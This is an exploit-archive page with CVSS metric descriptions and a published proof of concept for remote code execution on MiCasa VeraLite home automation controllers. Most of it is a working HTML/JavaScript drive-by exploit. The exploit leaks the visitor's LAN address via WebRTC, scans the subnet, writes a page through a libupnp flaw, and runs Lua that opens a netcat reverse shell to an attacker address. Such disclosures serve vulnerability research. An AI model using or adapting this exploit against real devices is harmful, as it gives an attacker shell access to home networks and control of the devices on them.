The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
MiCasa VeraLite Remote Code Execution# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware
1. Description
A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
2. Proof of Concept
<!--
@about
This file, when loaded in a browser, will attempt to get a reverse shell
on a VeraLite device on the client's network. This is achieved with the
following steps:
1. Acquire the client's internal IP address using webrtc. We then assume the
client is operating on a 24 network.
2. POST :49451/z3n.html to every address on the subnet. This leverages two
things we know to be true about VeraLite:
- there should be a UPnP HTTP server on 49451
- VeraLite uses a libupnp vulnerable to CVE-2016-6255.
3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
successfully created the file via CVE-2016-6255
4. z3n.html will allow us to bypass same origin policy and it will make a
POST request that executes RunLau. This also leverages information we
know to be true about Veralite:
- the control URL for HomeAutomationGateway is /upnp/control/hag
- no auth required
5. Our RunLua code executes a reverse shell to 192.168.217:1270.
@note
This code doesn't run fast in Firefox. This appears to largely be a performance
issue associated with attaching a lot of iframes to a page. Give the shell
popping a couple of minutes. In Chrome, it runs pretty fast but might
exhaust socket usage.
@citations
- WebRTC IP leak: https://github.com/diafygi/webrtc-ips
- Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
- CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script>
/**
* POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
* libupnp then the page will be written. Once the request has
* completed, we attempt to load it in an iframe in order to bypass
* same origin policy. If the page is loaded into the iframe then
* it will make a soap action request with the action RunLua. The
* Lua code will execute a reverse shell.
* @param ip the ip address to request to
* @param frame_id the id of the iframe to create
*/
function create_page(ip, frame_id)
{
payload = "<!DOCTYPE html>\n" +
"<html>\n" +
"<head>\n" +
"<title>Try To See It Once My Way</title>\n" +
"<script>\n" +
"function exec_lua() {\n" +
"soap_request = "<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">";\n" +
"soap_request += "<s:Body>";\n" +
"soap_request += "<u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1">";\n" +
"soap_request += "<Code>os.execute("/bin/sh -c '(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&'")</Code>";\n" +
"soap_request += "</u:RunLua>";\n" +
"soap_request += "</s:Body>";\n" +
"soap_request += "</s:Envelope>";\n" +
"xhttp = new XMLHttpRequest();\n" +
"xhttp.open("POST", "upnp/control/hag", true);\n" +
"xhttp.setRequestHeader("MIME-Version", "1.0");\n" +
"xhttp.setRequestHeader("Content-type", "text/xml;charset="utf-8"");\n" +
"xhttp.setRequestHeader("Soapaction", ""urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"");\n" +
"xhttp.send(soap_request);\n" +
"}\n" +
"</script>\n" +
"</head>\n" +
"<body onload="exec_lua()">\n" +
"Zen?\n" +
"</body>\n" +
"</html>";
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://" + ip + ":49451/z3n.html", true);
xhttp.timeout = 1000;
xhttp.onreadystatechange = function()
{
if (xhttp.readyState == XMLHttpRequest.DONE)
{
new_iframe = document.createElement('iframe');
new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
new_iframe.setAttribute("id", frame_id);
new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
document.body.appendChild(new_iframe);
}
};
xhttp.send(payload);
}
/**
* This function abuses the webrtc internal IP leak. This function
* will find the the upper three bytes of network address and simply
* assume that the client is on a 24 network.
*
* Once we have an ip range, we will attempt to create a page on a
* vulnerable libupnp server via create_page().
*/
function spray_and_pray()
{
RTCPeerConnection = window.RTCPeerConnection ||
window.mozRTCPeerConnection ||
window.webkitRTCPeerConnection;
peerConn = new RTCPeerConnection({iceServers:[]});
noop = function() { };
peerConn.createDataChannel("");
peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
peerConn.onicecandidate = function(ice)
{
if (!ice || !ice.candidate || !ice.candidate.candidate)
{
return;
}
clientNetwork = /([0-9]{1,3}(.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
peerConn.onicecandidate = noop;
if (clientNetwork && clientNetwork.length > 0)
{
for (i = 0; i < 255; i++)
{
create_page(clientNetwork + '.' + i, "page"+i);
}
}
};
}
</script>
</head>
<body onload="spray_and_pray()">
Everything zen.
</body>
</html>
3. Solution:
No solution exists
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum